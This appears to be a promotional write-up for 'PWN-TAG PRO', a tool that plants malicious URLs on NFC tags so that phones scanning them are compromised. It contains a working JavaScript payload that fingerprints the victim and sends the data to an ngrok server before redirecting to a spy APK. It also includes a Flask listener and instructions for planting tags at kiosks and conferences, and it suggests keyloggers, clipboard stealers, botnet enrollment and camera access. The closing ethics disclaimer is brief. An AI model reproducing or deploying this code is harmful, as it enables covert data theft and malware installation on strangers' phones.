PWN-TAG PRO - Zero-Click NFC Payloads

"Tap to PWN." NFC as a silent weapon - delivering payloads without a click. Built for offense. Designed for education.

By: ek0mssavi0r.dev

What is PWN-TAG?

PWN-TAG PRO is a real-world zero-click NFC payload delivery framework.

Using NFC (Near Field Communication) tags, we can trigger silent payload execution on mobile devices - no tap confirmation, no user interaction - if we control the redirection domain (like a static ngrok subdomain).

This tool helps with:
Fingerprinting phones
Delivering APKs
Botnet joining (like Rogue or Eva ADB botnets)
Social engineering ops
Real-time JS-based payload delivery

PWN-TAG is not a toy - it's an active field exploit vector that uses real-world NFC tech, live payload servers, and modern web exploits.
How NFC Tech is Used to Exploit Phones:

NFC is a short-range wireless standard (13.56 MHz) used in tap-to-pay, smart posters, and device pairing. NFC tags contain a tiny rewritable chip that can store text, URLs, or commands.

When a phone scans an NFC tag:

The tag's content (usually a URL) is opened automatically
⚠ On Android, static domains load instantly - no user confirmation
On iOS, tags open in Safari or prompt for confirmation unless app-handled
PWN-TAG leverages this by writing a malicious static URL to the NFC chip. Once scanned, it instantly opens a live HTML page served from our attack server.
Anatomy of a Payload (HTML + JS Breakdown)

Let's walk through a core part of test_shell.html, the base payload used in zero-click attacks.

payloads/test_shell.html

<html>
  <head>
    <title>PWN TAG :: Test Shell</title>
    <script>
      // Fingerprinting the victim
      const log = {
        userAgent: navigator.userAgent,
        screen: `${screen.width}x${screen.height}`,
        tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
        platform: navigator.platform,
        lang: navigator.language
      };

      // Send the log to our Flask listener
      fetch("https://pwn-tag.ngrok.app/testlog", {
        method: "POST",
        body: JSON.stringify(log),
        headers: { "Content-Type": "application/json" }
      });

      // Delay, then redirect to payload
      setTimeout(() => {
        window.location.href = "https://pwn-tag.ngrok.app/payloads/spy.apk";
      }, 1500);
    </script>
  </head>
</html>

What This Does
Collects passive device data:
OS, screen size, language, timezone, etc.
POSTs to your listener server (flask_server.py)
Redirects silently to another payload (e.g., an APK)
This means within 1–2 seconds of a user scanning the NFC tag, you have:
Full client fingerprint
A logged hit with time and IP


Payload delivery in motion

flask_server.py - The Listener

Here's a snippet from the Flask listener that receives POST data:

@app.route('/testlog', methods=['POST'])
def testlog():
    data = request.get_json()
    print(f"[+] Fingerprint: {data}")
    return '', 200
This instantly logs every device that scans your tag - timestamped, printable, and extensible.
You can add file writes, IP tracking, Discord webhooks, or full dashboards here.

Why Static Domains Matter for Exploitation

Free ngrok URLs change every time you reboot:

https://abc1234.ngrok.io → BREAKS YOUR TAGS

ngrok Pro lets you reserve:

https://pwn-tag.ngrok.app → PERMANENT

That means once your tag is written - it's valid forever. You can change what the page does anytime without touching the tag again.

Static domains = zero-click trigger = red team goldmine

Example Payload Use Cases

Payload Path Behavior
-test_shell.html Fingerprint + redirect Logging and payload delivery
-beef_shell.html Injects BEEF JS hook BEEF C2 control (requires setup)
-spy.apk Drops APK to Android Direct install attempt
-bot_joiner.html Enrolls into Rogue Botnet JS beacon → C2 trigger

These payloads are fully editable. You can build:
Browser exploit loaders
Clipboard stealers
WiFi recon tools
Fake app updates
Crypto wallet phishing pages
Reverse shell triggers

NFC Magic in Action

Writing the tag

Use NFC Tools (or any NFC writer):

+Tap Write
+Add a new URL record

Paste in:

https://pwn-tag.ngrok.app/payloads/test_shell.html

Write the tag

Stick it anywhere (conference badge, coffee table, public kiosk)

Any NFC-capable phone that taps it → executes your code instantly.

Advanced JavaScript Combo Ideas

You can chain multiple scripts:

<script src="clipboard.js"></script>
<script src="keylogger.js"></script>
<script src="result.js"></script>
Or add active recon:
fetch("https://ipinfo.io/json")
  .then(res => res.json())
  .then(data => {
    fetch("/iplog", {
      method: "POST",
      body: JSON.stringify(data),
      headers: { "Content-Type": "application/json" }
    });
  });
Or even use the camera:
<script>
  navigator.mediaDevices.getUserMedia({ video: true })
    .then(stream => {
      // Can screenshot, stream, or log camera access attempt
    });
</script>
You're only limited by browser sandboxing and imagination.


Ethics & Responsibility
PWN-TAG PRO is for education, research, and red team simulation only.
Use this tool to:
Teach mobile security
Test NFC defenses
Demonstrate physical security risks
Never use it against real users or targets without explicit permission.
Repo Access


Explore the full tool on GitHub:
 https://github.com/ekomsSavior/PWN-TAG/tree/pwn_tag_pro

Final Words

NFC is more than payment tech. It's a weapon.
PWN-TAG PRO turns an innocent-looking sticker into a stealth payload injector.
I built it for the hackers, educators, red teamers, and future defenders.
Test it. Break it. Learn from it. Improve it.

By ekoms savior
Defending the future by building tools worth fearing.